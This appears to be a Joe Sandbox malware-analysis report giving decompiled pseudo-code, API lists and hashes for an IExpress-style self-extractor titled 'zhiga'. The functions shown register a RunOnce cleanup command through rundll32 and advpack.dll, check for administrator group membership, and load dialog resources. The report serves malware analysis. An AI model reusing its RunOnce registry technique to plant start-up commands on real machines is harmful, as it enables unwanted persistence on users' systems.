                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                        • API String ID: 2659952014-2428544900
                                                                        • Opcode ID: af52a5f68144c05ae8cb9eca2e5313ec7edcc7ee12002e194ddcf87f74c8484e
                                                                        • Instruction ID: d7b0e3628f32fb5107f536d484f53446f5a43f7ea33ba94c891ab12707549c1b
                                                                        • Opcode Fuzzy Hash: af52a5f68144c05ae8cb9eca2e5313ec7edcc7ee12002e194ddcf87f74c8484e
                                                                        • Instruction Fuzzy Hash: 5F41A571E0012CAFEF64AB649C45AFE77BDEB15710F0440AAF545D2100DB749E86AFA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 62%
                                                                        			E00F82267() {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				char _v836;
                                                                        				void* _v840;
                                                                        				int _v844;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t19;
                                                                        				intOrPtr _t33;
                                                                        				void* _t38;
                                                                        				intOrPtr* _t42;
                                                                        				void* _t45;
                                                                        				void* _t47;
                                                                        				void* _t49;
                                                                        				signed int _t51;
                                                                        
                                                                        				_t19 =  *0xf88004; // 0x7e92e7a6
                                                                        				_t20 = _t19 ^ _t51;
                                                                        				_v8 = _t19 ^ _t51;
                                                                        				if( *0xf88530 != 0) {
                                                                        					_push(_t49);
                                                                        					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
                                                                        						_push(_t38);
                                                                        						_v844 = 0x238;
                                                                        						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
                                                                        							_push(_t47);
                                                                        							memset( &_v268, 0, 0x104);
                                                                        							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                        								E00F8658A( &_v268, 0x104, 0xf81140);
                                                                        							}
                                                                        							_push("C:\Users\FRONTD~1\AppData\Local\Temp\IXP001.TMP\");
                                                                        							E00F8171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
                                                                        							_t42 =  &_v836;
                                                                        							_t45 = _t42 + 1;
                                                                        							_pop(_t47);
                                                                        							do {
                                                                        								_t33 =  *_t42;
                                                                        								_t42 = _t42 + 1;
                                                                        							} while (_t33 != 0);
                                                                        							RegSetValueExA(_v840, "wextract_cleanup1", 0, 1,  &_v836, _t42 - _t45 + 1);
                                                                        						}
                                                                        						_t20 = RegCloseKey(_v840);
                                                                        						_pop(_t38);
                                                                        					}
                                                                        					_pop(_t49);
                                                                        				}
                                                                        				return E00F86CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
                                                                        			}




















                                                                        APIs
                                                                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 00F822A3
                                                                        • RegQueryValueExA.ADVAPI32(?,wextract_cleanup1,00000000,00000000,?,?,00000001), ref: 00F822D8
                                                                        • memset.MSVCRT ref: 00F822F5
                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00F82305
                                                                        • RegSetValueExA.ADVAPI32(?,wextract_cleanup1,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 00F8236E
                                                                        • RegCloseKey.ADVAPI32(?), ref: 00F8237A
                                                                        Strings
                                                                        • C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\, xrefs: 00F82321
                                                                        • wextract_cleanup1, xrefs: 00F8227C, 00F822CD, 00F82363
                                                                        • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00F82299
                                                                        • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 00F8232D
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup1
                                                                        • API String ID: 3027380567-490507210
                                                                        • Opcode ID: 500901cec70fe4e95f1d2f1b69edfec912e172d96d2ac7c019fc4f6d56ec277c
                                                                        • Instruction ID: 31250253b458fc3ab86304a07b99c451c071ae6b1201425c2b033351fb44ab4e
                                                                        • Opcode Fuzzy Hash: 500901cec70fe4e95f1d2f1b69edfec912e172d96d2ac7c019fc4f6d56ec277c
                                                                        • Instruction Fuzzy Hash: 9331C571A0021C6BDB21AB50DC49FEA7B7CEB15750F4401AAB50DEA050EA75AB89EB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 87%
                                                                        			E00F83100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                        				void* _t8;
                                                                        				void* _t11;
                                                                        				void* _t15;
                                                                        				struct HWND__* _t16;
                                                                        				struct HWND__* _t33;
                                                                        				struct HWND__* _t34;
                                                                        
                                                                        				_t8 = _a8 - 0xf;
                                                                        				if(_t8 == 0) {
                                                                        					if( *0xf88590 == 0) {
                                                                        						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
                                                                        						 *0xf88590 = 1;
                                                                        					}
                                                                        					L13:
                                                                        					return 0;
                                                                        				}
                                                                        				_t11 = _t8 - 1;
                                                                        				if(_t11 == 0) {
                                                                        					L7:
                                                                        					_push(0);
                                                                        					L8:
                                                                        					EndDialog(_a4, ??);
                                                                        					L9:
                                                                        					return 1;
                                                                        				}
                                                                        				_t15 = _t11 - 0x100;
                                                                        				if(_t15 == 0) {
                                                                        					_t16 = GetDesktopWindow();
                                                                        					_t33 = _a4;
                                                                        					E00F843D0(_t33, _t16);
                                                                        					SetDlgItemTextA(_t33, 0x834,  *0xf88d4c);
                                                                        					SetWindowTextA(_t33, "zhiga");
                                                                        					SetForegroundWindow(_t33);
                                                                        					_t34 = GetDlgItem(_t33, 0x834);
                                                                        					 *0xf888b8 = GetWindowLongA(_t34, 0xfffffffc);
                                                                        					SetWindowLongA(_t34, 0xfffffffc, E00F830C0);
                                                                        					return 1;
                                                                        				}
                                                                        				if(_t15 != 1) {
                                                                        					goto L13;
                                                                        				}
                                                                        				if(_a12 != 6) {
                                                                        					if(_a12 != 7) {
                                                                        						goto L9;
                                                                        					}
                                                                        					goto L7;
                                                                        				}
                                                                        				_push(1);
                                                                        				goto L8;
                                                                        			}










                                                                        APIs
                                                                        • EndDialog.USER32(?,00000000), ref: 00F8313B
                                                                        • GetDesktopWindow.USER32 ref: 00F8314B
                                                                        • SetDlgItemTextA.USER32(?,00000834), ref: 00F8316A
                                                                        • SetWindowTextA.USER32(?,zhiga), ref: 00F83176
                                                                        • SetForegroundWindow.USER32(?), ref: 00F8317D
                                                                        • GetDlgItem.USER32(?,00000834), ref: 00F83185
                                                                        • GetWindowLongA.USER32(00000000,000000FC), ref: 00F83190
                                                                        • SetWindowLongA.USER32(00000000,000000FC,00F830C0), ref: 00F831A3
                                                                        • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 00F831CA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                        • String ID: zhiga
                                                                        • API String ID: 3785188418-3705506974
                                                                        • Opcode ID: a7072cb8c7411702f7fbdcc0732567a77d93f923634abdc61bc0a48d0245dfd1
                                                                        • Instruction ID: 9f80be09db7ffeee191898cd68db2de6920b69796e62a89e0ca2e1f9887b5527
                                                                        • Opcode Fuzzy Hash: a7072cb8c7411702f7fbdcc0732567a77d93f923634abdc61bc0a48d0245dfd1
                                                                        • Instruction Fuzzy Hash: C211B431A04619BBEB216F64AC0CBFA3A64FB46F70F100612F815D51F0DB749641FB42
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 91%
                                                                        			E00F818A3(void* __edx, void* __esi) {
                                                                        				signed int _v8;
                                                                        				short _v12;
                                                                        				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                        				char _v20;
                                                                        				long _v24;
                                                                        				void* _v28;
                                                                        				void* _v32;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				signed int _t23;
                                                                        				long _t45;
                                                                        				void* _t49;
                                                                        				int _t50;
                                                                        				void* _t52;
                                                                        				signed int _t53;
                                                                        
                                                                        				_t51 = __esi;
                                                                        				_t49 = __edx;
                                                                        				_t23 =  *0xf88004; // 0x7e92e7a6
                                                                        				_v8 = _t23 ^ _t53;
                                                                        				_t25 =  *0xf88128; // 0x2
                                                                        				_t45 = 0;
                                                                        				_v12 = 0x500;
                                                                        				_t50 = 2;
                                                                        				_v16.Value = 0;
                                                                        				_v20 = 0;
                                                                        				if(_t25 != _t50) {
                                                                        					L20:
                                                                        					return E00F86CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
                                                                        				}
                                                                        				if(E00F817EE( &_v20) != 0) {
                                                                        					_t25 = _v20;
                                                                        					if(_v20 != 0) {
                                                                        						 *0xf88128 = 1;
                                                                        					}
                                                                        					goto L20;
                                                                        				}
                                                                        				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
                                                                        					goto L20;
                                                                        				}
                                                                        				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
                                                                        					L17:
                                                                        					CloseHandle(_v28);
                                                                        					_t25 = _v20;
                                                                        					goto L20;
                                                                        				} else {
                                                                        					_push(__esi);
                                                                        					_t52 = LocalAlloc(0, _v24);
                                                                        					if(_t52 == 0) {
                                                                        						L16:
                                                                        						_pop(_t51);
                                                                        						goto L17;
                                                                        					}
                                                                        					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
                                                                        						L15:
                                                                        						LocalFree(_t52);
                                                                        						goto L16;
                                                                        					} else {
                                                                        						if( *_t52 <= 0) {
                                                                        							L14:
                                                                        							FreeSid(_v32);
                                                                        							goto L15;
                                                                        						}
                                                                        						_t15 = _t52 + 4; // 0x4
                                                                        						_t50 = _t15;
                                                                        						while(EqualSid( *_t50, _v32) == 0) {
                                                                        							_t45 = _t45 + 1;
                                                                        							_t50 = _t50 + 8;
                                                                        							if(_t45 <  *_t52) {
                                                                        								continue;
                                                                        							}
                                                                        							goto L14;
                                                                        						}
                                                                        						 *0xf88128 = 1;
                                                                        						_v20 = 1;
                                                                        						goto L14;
                                                                        					}
                                                                        				}
                                                                        			}



















                                                                        APIs
                                                                          • Part of subcall function 00F817EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00F818DD), ref: 00F8181A
                                                                          • Part of subcall function 00F817EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00F8182C
                                                                          • Part of subcall function 00F817EE: AllocateAndInitializeSid.ADVAPI32(00F818DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00F818DD), ref: 00F81855
                                                                          • Part of subcall function 00F817EE: FreeSid.ADVAPI32(?,?,?,?,00F818DD), ref: 00F81883
                                                                          • Part of subcall function 00F817EE: FreeLibrary.KERNEL32(00000000,?,?,?,00F818DD), ref: 00F8188A
                                                                        • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 00F818EB
                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00F818F2
                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 00F8190A
                                                                        • GetLastError.KERNEL32 ref: 00F81918
                                                                        • LocalAlloc.KERNEL32(00000000,?,?), ref: 00F8192C
                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00F81944
                                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00F81964
                                                                        • EqualSid.ADVAPI32(00000004,?), ref: 00F8197A
                                                                        • FreeSid.ADVAPI32(?), ref: 00F8199C
                                                                        • LocalFree.KERNEL32(00000000), ref: 00F819A3
                                                                        • CloseHandle.KERNEL32(?), ref: 00F819AD
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                        • String ID:
                                                                        • API String ID: 2168512254-0
                                                                        • Opcode ID: 8524a9017b6cce86701870aa89d6d61a0b53c46788eb92c9b3d830699094614c
                                                                        • Instruction ID: 5668ca8bb04facf79600e992d2315e5fe07a90ca33389f38551c9af48e5d7a45
                                                                        • Opcode Fuzzy Hash: 8524a9017b6cce86701870aa89d6d61a0b53c46788eb92c9b3d830699094614c
                                                                        • Instruction Fuzzy Hash: 3D311971E00209EBEB20AFA5DC59AFFBBBCFB04750F10052AE545D2150DB349906EB61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 82%
                                                                        			E00F8468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
                                                                        				long _t4;
                                                                        				void* _t11;
                                                                        				CHAR* _t14;
                                                                        				void* _t15;
                                                                        				long _t16;
                                                                        
                                                                        				_t14 = __ecx;
                                                                        				_t11 = __edx;
                                                                        				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
                                                                        				_t16 = _t4;
                                                                        				if(_t16 <= _a4 && _t11 != 0) {
                                                                        					if(_t16 == 0) {
                                                                        						L5:
                                                                        						return 0;
                                                                        					}
                                                                        					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
                                                                        					if(_t15 == 0) {
                                                                        						goto L5;
                                                                        					}
                                                                        					__imp__memcpy_s(_t11, _a4, _t15, _t16);
                                                                        					FreeResource(_t15);
                                                                        					return _t16;
                                                                        				}
                                                                        				return _t4;
                                                                        			}









                                                                        APIs
                                                                        • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F846A0
                                                                        • SizeofResource.KERNEL32(00000000,00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846A9
                                                                        • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F846C3
                                                                        • LoadResource.KERNEL32(00000000,00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846CC
                                                                        • LockResource.KERNEL32(00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846D3
                                                                        • memcpy_s.MSVCRT ref: 00F846E5
                                                                        • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846EF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                        • String ID: TITLE$zhiga
                                                                        • API String ID: 3370778649-3314309
                                                                        • Opcode ID: a93137c2b41dd939d9e23fd44a476d501469d30be52240723983e37d3f339cd7
                                                                        • Instruction ID: 85ad2563db596ea34110a15934639ad1240650705a25ad884ba84c91a5fa9cc9
                                                                        • Opcode Fuzzy Hash: a93137c2b41dd939d9e23fd44a476d501469d30be52240723983e37d3f339cd7
                                                                        • Instruction Fuzzy Hash: A901F9326442097BF32027A55C0CFFB7E2CDBC6F61F080015FA49971C0D9719840A7B2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 57%
                                                                        			E00F817EE(intOrPtr* __ecx) {
                                                                        				signed int _v8;
                                                                        				short _v12;
                                                                        				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                        				_Unknown_base(*)()* _v20;
                                                                        				void* _v24;
                                                                        				intOrPtr* _v28;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t14;
                                                                        				_Unknown_base(*)()* _t20;
                                                                        				long _t28;
                                                                        				void* _t35;
                                                                        				struct HINSTANCE__* _t36;
                                                                        				signed int _t38;
                                                                        				intOrPtr* _t39;
                                                                        
                                                                        				_t14 =  *0xf88004; // 0x7e92e7a6
                                                                        				_v8 = _t14 ^ _t38;
                                                                        				_v12 = 0x500;
                                                                        				_t37 = __ecx;
                                                                        				_v16.Value = 0;
                                                                        				_v28 = __ecx;
                                                                        				_t28 = 0;
                                                                        				_t36 = LoadLibraryA("advapi32.dll");
                                                                        				if(_t36 != 0) {
                                                                        					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
                                                                        					_v20 = _t20;
                                                                        					if(_t20 != 0) {
                                                                        						 *_t37 = 0;
                                                                        						_t28 = 1;
                                                                        						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
                                                                        							_t37 = _t39;
                                                                        							 *0xf8a288(0, _v24, _v28);
                                                                        							_v20();
                                                                        							if(_t39 != _t39) {
                                                                        								asm("int 0x29");
                                                                        							}
                                                                        							FreeSid(_v24);
                                                                        						}
                                                                        					}
                                                                        					FreeLibrary(_t36);
                                                                        				}
                                                                        				return E00F86CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
                                                                        			}




















                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00F818DD), ref: 00F8181A
                                                                        • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00F8182C
                                                                        • AllocateAndInitializeSid.ADVAPI32(00F818DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00F818DD), ref: 00F81855
                                                                        • FreeSid.ADVAPI32(?,?,?,?,00F818DD), ref: 00F81883
                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,00F818DD), ref: 00F8188A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                        • String ID: CheckTokenMembership$advapi32.dll
                                                                        • API String ID: 4204503880-1888249752
                                                                        • Opcode ID: b8f16d077d155776bc91a1e7579d35a24282ae2c62bc7348a9d6821702d5d34b
                                                                        • Instruction ID: b59704a69fe716f9aa49d14166eb9e7d063285a8d20c566dbf5e6ae3ee36b68e
                                                                        • Opcode Fuzzy Hash: b8f16d077d155776bc91a1e7579d35a24282ae2c62bc7348a9d6821702d5d34b
                                                                        • Instruction Fuzzy Hash: 0A116A71E00209AFDB10AFA4DC4AAFEBB7CFF44711F10016AF905E6250DB719D059791
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00F83450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                        				void* _t7;
                                                                        				void* _t11;
                                                                        				struct HWND__* _t12;
                                                                        				int _t22;
                                                                        				struct HWND__* _t24;
                                                                        
                                                                        				_t7 = _a8 - 0x10;
                                                                        				if(_t7 == 0) {
                                                                        					EndDialog(_a4, 2);
                                                                        					L11:
                                                                        					return 1;
                                                                        				}
                                                                        				_t11 = _t7 - 0x100;
                                                                        				if(_t11 == 0) {
                                                                        					_t12 = GetDesktopWindow();
                                                                        					_t24 = _a4;
                                                                        					E00F843D0(_t24, _t12);
                                                                        					SetWindowTextA(_t24, "zhiga");
                                                                        					SetDlgItemTextA(_t24, 0x838,  *0xf89404);
                                                                        					SetForegroundWindow(_t24);
                                                                        					goto L11;
                                                                        				}
                                                                        				if(_t11 == 1) {
                                                                        					_t22 = _a12;
                                                                        					if(_t22 < 6) {
                                                                        						goto L11;
                                                                        					}
                                                                        					if(_t22 <= 7) {
                                                                        						L8:
                                                                        						EndDialog(_a4, _t22);
                                                                        						return 1;
                                                                        					}
                                                                        					if(_t22 != 0x839) {
                                                                        						goto L11;
                                                                        					}
                                                                        					 *0xf891dc = 1;
                                                                        					goto L8;
                                                                        				}
                                                                        				return 0;
                                                                        			}









                                                                        APIs
                                                                        • EndDialog.USER32(?,?), ref: 00F83490
                                                                        • GetDesktopWindow.USER32 ref: 00F8349A
                                                                        • SetWindowTextA.USER32(?,zhiga), ref: 00F834B2
                                                                        • SetDlgItemTextA.USER32(?,00000838), ref: 00F834C4
                                                                        • SetForegroundWindow.USER32(?), ref: 00F834CB
                                                                        • EndDialog.USER32(?,00000002), ref: 00F834D8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: Window$DialogText$DesktopForegroundItem
                                                                        • String ID: zhiga
                                                                        • API String ID: 852535152-3705506974
                                                                        • Opcode ID: 643472a08c522f5abda10d25bd833a1da242c41b87e3505aeb41fb45cac7f958
                                                                        • Instruction ID: 3a4c848608eb3baff4ff59ed4fddf151d20713878418aa0db3f8dd6fc642cad3
                                                                        • Opcode Fuzzy Hash: 643472a08c522f5abda10d25bd833a1da242c41b87e3505aeb41fb45cac7f958
                                                                        • Instruction Fuzzy Hash: 9701B132644518ABEB16AF64DC0C9FD3A64EB05F20F104411F947865B0CB749F51FB81
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 95%
                                                                        			E00F82AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t16;
                                                                        				int _t21;
                                                                        				char _t32;
                                                                        				intOrPtr _t34;
                                                                        				char* _t38;
                                                                        				char _t42;
                                                                        				char* _t44;
                                                                        				CHAR* _t52;
                                                                        				intOrPtr* _t55;
                                                                        				CHAR* _t59;
                                                                        				void* _t62;
                                                                        				CHAR* _t64;
                                                                        				CHAR* _t65;
                                                                        				signed int _t66;
                                                                        
                                                                        				_t60 = __edx;
                                                                        				_t16 =  *0xf88004; // 0x7e92e7a6
                                                                        				_t17 = _t16 ^ _t66;
                                                                        				_v8 = _t16 ^ _t66;
                                                                        				_t65 = _a4;
                                                                        				_t44 = __edx;
                                                                        				_t64 = __ecx;
                                                                        				if( *((char*)(__ecx)) != 0) {
                                                                        					GetModuleFileNameA( *0xf89a3c,  &_v268, 0x104);
                                                                        					while(1) {
                                                                        						_t17 =  *_t64;
                                                                        						if(_t17 == 0) {
                                                                        							break;
                                                                        						}
                                                                        						_t21 = IsDBCSLeadByte(_t17);
                                                                        						 *_t65 =  *_t64;
                                                                        						if(_t21 != 0) {
                                                                        							_t65[1] = _t64[1];
                                                                        						}
                                                                        						if( *_t64 != 0x23) {
                                                                        							L19:
                                                                        							_t65 = CharNextA(_t65);
                                                                        						} else {
                                                                        							_t64 = CharNextA(_t64);
                                                                        							if(CharUpperA( *_t64) != 0x44) {
                                                                        								if(CharUpperA( *_t64) != 0x45) {
                                                                        									if( *_t64 == 0x23) {
                                                                        										goto L19;
                                                                        									}
                                                                        								} else {
                                                                        									E00F81680(_t65, E00F817C8(_t44, _t65),  &_v268);
                                                                        									_t52 = _t65;
                                                                        									_t14 =  &(_t52[1]); // 0x2
                                                                        									_t60 = _t14;
                                                                        									do {
                                                                        										_t32 =  *_t52;
                                                                        										_t52 =  &(_t52[1]);
                                                                        									} while (_t32 != 0);
                                                                        									goto L17;
                                                                        								}
                                                                        							} else {
                                                                        								E00F865E8( &_v268);
                                                                        								_t55 =  &_v268;
                                                                        								_t62 = _t55 + 1;
                                                                        								do {
                                                                        									_t34 =  *_t55;
                                                                        									_t55 = _t55 + 1;
                                                                        								} while (_t34 != 0);
                                                                        								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
                                                                        								if(_t38 != 0 &&  *_t38 == 0x5c) {
                                                                        									 *_t38 = 0;
                                                                        								}
                                                                        								E00F81680(_t65, E00F817C8(_t44, _t65),  &_v268);
                                                                        								_t59 = _t65;
                                                                        								_t12 =  &(_t59[1]); // 0x2
                                                                        								_t60 = _t12;
                                                                        								do {
                                                                        									_t42 =  *_t59;
                                                                        									_t59 =  &(_t59[1]);
                                                                        								} while (_t42 != 0);
                                                                        								L17:
                                                                        								_t65 =  &(_t65[_t52 - _t60]);
                                                                        							}
                                                                        						}
                                                                        						_t64 = CharNextA(_t64);
                                                                        					}
                                                                        					 *_t65 = _t17;
                                                                        				}
                                                                        				return E00F86CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
                                                                        			}

                                                                        APIs
                                                                        • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00F82AE6
                                                                        • IsDBCSLeadByte.KERNEL32(00000000), ref: 00F82AF2
                                                                        • CharNextA.USER32(?), ref: 00F82B12
                                                                        • CharUpperA.USER32 ref: 00F82B1E
                                                                        • CharPrevA.USER32(?,?), ref: 00F82B55
                                                                        • CharNextA.USER32(?), ref: 00F82BD4
                                                                        Memory Dump Source
